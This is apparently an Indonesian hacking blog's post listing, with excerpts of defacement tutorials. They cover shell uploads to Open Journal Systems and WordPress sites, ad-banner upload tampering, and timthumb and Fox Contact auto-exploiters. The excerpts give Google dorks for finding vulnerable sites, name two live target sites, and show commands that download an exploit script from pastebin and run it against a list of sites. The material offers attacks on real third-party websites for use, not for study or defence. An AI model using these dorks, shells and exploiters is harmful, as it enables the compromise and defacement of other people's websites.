Skip to main content

Posts

Deface Banner Iklan Vulnerability Tamper Data Android

Assalamualaikum wr.wb

Okay selamat malam/pagi/siang/sore para hekel hekel jaman now

Kali ini gua bakal share tutorial deface poc banner iklan tamper data di android ea

Pasti kalian pernah mikir gimana tuh caranya tamper data di android nah disini gua bakal share tutor deface banner iklan + tamper data di android

Ok lgsung aja bahan bahanya
1.
- aplikasi lightning browser (bisa di download di play store)
- aplikasi sandroproxy (bisa di download di play store)
Contoh apk nya ada di gambar atas tuh yah su liat kan?gk liat mati aja gan hehe:)
2.
Dork :
inurl:/banner/pasang
intitle:Pasang Banner Murah
inurl:/iklan/pasang
intitle:Pasang Banner Gratis
3.
-Kesabaran :v
-kopi, udud, ceue.


Lalu jika kalian sudah mendownload kedua apk di atas, Yang pertama buka aplikasi sandroproxy lalu klik *Developers mode, Capture data


Nah Yang Kedua Kalian Buka apk lightning browser lalu klik titik tiga kecil di pojok kanan atas, Lalu klik Settings Klik Lagi General Settings Lalu Ubah HTTP Proxynya Ke Manua…
Recent posts

Deface Poc Open Journal System (OJS)

Deface Poc Open Journal System (OJS)

Halo gaes :v yups balik lagi sama gua ./CR0T_D1LU4R

Kali ini gua mau share tutorial deface poc OJS ( Open Journal System)

Nah langsung aja tanpa banyak bacot

-Dork: index.php/index/user/register
index/user/register/

Cara defacenya gmna bang?

Oke jadi setelah kalian ngedork pake dork di atas ? Langkah yang kalian lakukan adalah cek vulnerability nya dulu sebelum registrasi dengan cara? https://crotdiluar.blogspot.com/files nah kalo muncul Index Of ? Itu tandanya vuln

Oke langsung aja ke tkp :v

1. Kalian register dulu lalu centang semua, register pake email fake yah, kalo kalian bar bar kaya Kontolers+62 mah gapapa pake gmail asli? Resiko? Yah paling cuma di cyduk wk


2. Setelah Registasi Klik "New Submission" slurd 

3. Sekarang waktunya upload shel slurd, upload shell ext:phtml yah slurd, contoh nama shellnya OFFICIALFCA.phtml 
4. Jika berhasil upload shell nya slurd? Nanti akan seperti ini
5. Kalo udah ke upload tinggal kyta akses slurd 

Just …

Belajar program php & praktek membuat uploader

Bahasa program php beserta fungsi / pemahaman function"nya



Hey yo wasap ges balik lagi sama gua ./CR0T_D1LU4R kali ini gua mau membahas + belajar program bahasa php ya gaes, nah disini gua cuma copy paste aja ya, karna pemateri nya itu member gua si Mr.CryszTaL#301

Ok gaes jadi tanpa banyak bacot langsung aja kita ke materi

Kali ini gw mau bahas tentang program php ea ;v dan masing² function dri program php itu sndiri

Kalau kyta mau buat projeck php awalan sourcenya pake ini ya: <?php

Trus abis itu di situ ada echo ? Apa sih fungsi echo..

Jadi echo itu buat nampilin kata² ya beda ama hateemel yg naro kata2 asal aja , kalau di php musti ada function khususnya jadi kalau mau buat kata² musti pake echo 'isi kata2 lu'; nah tanda ; buat nutup ya dan ruang terbuka ' ' itu buat mulai dan akhir dari kata2 yg lu katain sndiri

Di echo kita jg blh nyisipin basic sc html kyk <br> / <center> <b> <h1> dan lainnya asal msh di di dlm echo '<br>…

Deface Poc Wp Add Admin

CARA DEFACE Wp add admin


Hey yo wasap guys balik lagi ama aing ./CR0T_D1LU4R yups pada kesempatan kali ini gua bakalan bagi bagi tutorial Deface Poc Wp Add Admin nah tapi website yang akan jadi target hanya website yang menggunakan CMS WODPRES yah gaes mau tau gmna cara deface nya? Siapkan bahan

Bahan:

- Dork: inurl:/wp-login.php?action=register site:in
- Xploit: wp-admin/theme-editor.php
- Gmail aktif
- Use your brain
- Shell
- Sc hecked by hecked by kalian wk

Oke langsung aja ke tutor

Langsung aja kalian ngedorking cek 1 persatu jika pas kalian xploitin ada bacaan register berarti tandanya vulnerability, nah kalo nemu? Kalian langsung aja daftarin ya pake gmail aktif kalian
Nah kalian daftarin seperti pict diatas pake gmail asli kalian atau gmail fake yang penting aktif ok ? 
Kalo sudah register cek gmail kalian nanti akan diberi pasword oleh website yang mau kalian kenthu Kalo sudah tau username dan paswordnya? Nah waktunya ngebokep gayn :v eh salah waktunya login wowkk seperti di …

Deface metode timthumb auto exploiter

Assalamualaikum wr.wb

Balik lagi gan Ama kita kita,

kali ini gua bakal share deface metode timthumb RFI(Remote File Inclusion) Nah Tapi Kali Ini Timthumbnya gk Perlu Repot Repot Manual Lagi Pasang Exploit dlu lah ini lah itu lah Nah kali ini gw kasih tutorial auto exploiter timthumb

Bahan yang diperlukan:
-Google dork:
 inurl:/admin/timthumb.php
 inurl:/timthumb.php
 inurl:/thumb.php
-Kuota Internet:v
-Kesabaran:D
-exploiter Disini
(Tools exploiter timthumb ini dibuat oleh anggota official FCA yg bernickname Mr.Kepo Dan Mr.CryszTaL#301 Thx To Mereka)

Ok Silahkan Kalian Dorking Di Google Dengan Dork Yang Sudah Diberikan Diatas
Nah karna gw tuh orangnya Baik Yah su jadi gw kasih nih live target

-http://maycongnghiephm.com/admin/timthumb.php
-http://usaplastic.vn/admin/timthumb.php

Nah kalian cek web tersebut jika version timthumb nya dibawah 2 atau 1.30 dll itu berarti vuln gan

Nah abis itu lgsung masukkin aja sitenya ke exploiternya yg kotak atas yah su
(Di sini gw gk make gambar yah …

Deface Fox Contact Auto Exploiter

Assalamualaikum wr.wb

Heyyo mamankk..
Balik lagi Ama gua Tn.Infinity

Kali ini Gua Bakal Share Tutorial Deface Fox Contact with Auto Exploiter

Ok lgsung aja ya su

Bahan bahan:
-Termux
-Exploiter Disini
-list website
-Dork: intext:"powered by fox contact"
             Kembangin lagi gan pake otak vokepers klean:v

Langkah 1:
Kalian Dorking dlu di google atau bisa pakai tools auto Dorking bisa dilihat Disini
Setelah kalian Dorking pilih sebanyak banyaknya web dan masukkan ke list website dengan cara
Ketik di termux:
$apt update && apt upgrade
$pkg install nano
$nano list.txt

Nah kalau udh isinya kalian isi dengan list website website tadi yang kalian Dorking

Nah contoh kek gitu

Nah setelah itu klik ctrl + x +y secara bersamaan..

Langkah 2:
Ketik di termux
$pkg install php
$pkg install wget
$wget linkexploiter -O exploit.php
ex:wget https://pastebin.com/raw/eRCNMehy -O exploit.php
$php exploit.php list.txt

Dan tunggu sampai selesai/muncul tulisan Shell Ok / deface Ok

Nah…

Tools Auto Dorking Via Termux

Assalamualaikum gayn..

Hello balik lagi Ama w Tn.Infinity
Ok kali ini w bakal share Tools Auto Dorking Via Termux Dan Cara Menggunakannya

Ok gk ush basa basi lagi yah asw lgsung ke tutornya!.

Bahan:-Termos(termux)
             -Kuota Internet (Ya Pasti Lah Asw trus lu liat tutor ini pakai apa?1!1!:v)

Cara installnya gampang ketik Di termux

$apt update && apt upgrade -y
$apt install lynx
$apt install git
$apt install curl
$git clone https://github.com/Hood3dRob1n/BinGoo
$cd BinGoo
$./bingoo

Note:tanda $ gk perlu ditulis

Nah nanti tampilannya bakalan kayak gini

Nah kalau udh kayak gitu tinggal pilih option apa yang klean mau contoh google =1
ketik 1

Nah kalau udah kayak gitu kalian mau pilih yang mana aja bebas contoh pilih 1
ketik 1

Nah tinggal kalian masukkin dork yang mau kalian pakai untuk Dorking contoh: .php?id=

Tunggu beberapa saat....

Dan Boom...

Muncul Web Webnya:b
Dan Setelah itu Terserah mau kalian apakan tuh web intinya kalian gk perlu capek capek lagi ngedork di go…